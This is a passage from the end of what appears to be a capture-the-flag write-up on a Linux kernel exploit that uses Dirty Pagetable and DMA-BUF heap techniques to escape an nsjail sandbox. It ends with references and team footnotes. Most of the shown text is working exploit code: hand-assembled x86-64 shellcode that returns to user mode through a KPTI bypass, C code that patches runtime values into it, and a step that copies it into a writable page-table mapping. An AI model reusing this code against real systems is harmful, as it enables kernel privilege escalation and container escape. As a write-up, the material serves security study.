        0x48, 0x89, 0x04, 0x24,                   // mov [rsp+0x00], rax
        0x48, 0x89, 0x44, 0x24, 0x08,             // mov [rsp+0x08], rax
        0x48, 0xb8, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, 0x22, // mov rax, <win>
        0x48, 0x89, 0x44, 0x24, 0x10,             // mov [rsp+0x10], rax
        0x48, 0xb8, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, 0x33, // mov rax, <cs>
        0x48, 0x89, 0x44, 0x24, 0x18,             // mov [rsp+0x18], rax
        0x48, 0xb8, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, // mov rax, <rflags>
        0x48, 0x89, 0x44, 0x24, 0x20,             // mov [rsp+0x20], rax
        0x48, 0xb8, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, 0x55, // mov rax, <stack>
        0x48, 0x89, 0x44, 0x24, 0x28,             // mov [rsp+0x28], rax
        0x48, 0xb8, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, // mov rax, <ss>
        0x48, 0x89, 0x44, 0x24, 0x30,             // mov [rsp+0x30], rax
        0x49, 0x8d, 0x87, 0x41, 0x0f, 0xc0, 0x00, // lea rax, [r15 + kpti_bypass]
        0xff, 0xe0,                               // jmp rax
        0xcc                                      // int3
      };

      // Fill in the runtime placeholders
      void *p;
      p = memmem(shellcode, sizeof(shellcode), "\x11\x11\x11\x11\x11\x11\x11\x11", 8);
      *(size_t*)p = getpid();
      p = memmem(shellcode, sizeof(shellcode), "\x22\x22\x22\x22\x22\x22\x22\x22", 8);
      *(size_t*)p = (size_t)&win;
      p = memmem(shellcode, sizeof(shellcode), "\x33\x33\x33\x33\x33\x33\x33\x33", 8);
      *(size_t*)p = user_cs;
      p = memmem(shellcode, sizeof(shellcode), "\x44\x44\x44\x44\x44\x44\x44\x44", 8);
      *(size_t*)p = user_rflags;
      p = memmem(shellcode, sizeof(shellcode), "\x55\x55\x55\x55\x55\x55\x55\x55", 8);
      *(size_t*)p = user_rsp;
      p = memmem(shellcode, sizeof(shellcode), "\x66\x66\x66\x66\x66\x66\x66\x66", 8);
      *(size_t*)p = user_ss;

      memcpy(wwwbuf + (phys_func & 0xfff), shellcode, sizeof(shellcode));
      puts("[+] GO!GO!");

      printf("%d\n", symlink("/jail/x", "/jail"));

      puts("[-] Failed...");
      close(fd);

      getchar();
      return 0;
    }

Yay!

References

1: Linux Slab Allocator - About slab allocator

2: 手を動かして理解するLinux Kernel Exploit - About Dirty Cred

3: Dirty Pagetable: A Novel Exploitation Technique To Rule Linux Kernel - The original article explaining about Dirty Pagetable

4: DMA-BUF Heaps - About DMA-BUF Heap

5: CoRJail: From Null Byte Overflow To Docker Escape Exploiting poll_list Objects In The Linux Kernel - How to bypass nsjail

*1:The team consists of st98, weak ptr-yudai, and keymoon.

*2:We can actually call it multiple times due to the lack of mutex, but it's not necessary.

*3:Allocation and release take place in the same function in this case, but it doesn't matter since we will free all objects in ④ eventually.

*4:The file structure is actually much larger in size.

*5:Refer to [3] for more details.